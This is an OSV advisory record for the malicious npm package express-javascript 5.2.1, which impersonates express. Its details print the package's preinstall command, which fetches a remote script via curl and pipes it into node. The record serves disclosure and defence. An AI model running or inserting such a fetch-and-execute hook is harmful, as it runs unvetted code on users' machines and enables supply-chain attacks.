{"id":"MAL-2026-17242","summary":"Malicious code in express-javascript (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (73e4909976d37fb7fb7dd30012d82bd882608df20716a824f1dc0efa074b5401)\nexpress-javascript@5.2.1 impersonates the express package (copying its description, author, contributors, repository, homepage, and dependency list verbatim) while its package.json preinstall lifecycle hook runs `curl https://web.archive.org/web/https://codeberg.org/hellscripter/install-scripts/raw/branch/main/node.js | node`, fetching a JavaScript file from a third-party account unrelated to the express publisher via a web.archive.org wrapper on a mutable `branch/main` ref and piping it into node with no integrity check. Every `npm install` of this package executes whatever bytes that endpoint returns on the installer's machine.\n","modified":"2026-09-29T15:00:05.493383053Z","published":"2026-09-29T14:40:22Z","database_specific":{"malicious-packages-origins":[{"import_time":"2026-09-29T14:44:37.392432Z","modified_time":"2026-09-29T14:40:22Z","sha256":"73e4909976d37fb7fb7dd30012d82bd882608df20716a824f1dc0efa074b5401","source":"amazon-inspector","versions":["5.2.1"],"id":"IN-MAL-2026-020632"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/express-javascript/v/5.2.1"}],"affected":[{"package":{"name":"express-javascript","ecosystem":"npm","purl":"pkg:npm/express-javascript"},"versions":["5.2.1"],"database_specific":{"indicators":{"package_integrity":[{"filename":"express-javascript-5.2.1.tgz","hashes":{"sha512_sri":"sha512-wpNV2u4N2loxL3yEpirCoQNlNK0QIpUizwMfJU3bOL9o3oIlYTRuT7+oNDTag6wKGV3bHqfe6jiTnSH51la3nA==","sha1":"befd8fdeba66846025490e7869147804c88375e9"}}],"evidence_files":[{"sha256":"802b379278fac7220d1cfe63545dbd2e20afa28c34d344edb000cb18a0d1c620","tlsh":"1f51ba21cc4e8c6326c5a2dd3c69a542612188078e41f81cf759539c8f8e56f71b9fbe","path":"package.json"}]},"cwes":[{"description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code","cweId":"CWE-506"}],"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/express-javascript/MAL-2026-17242.json"}}],"schema_version":"1.9.0","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}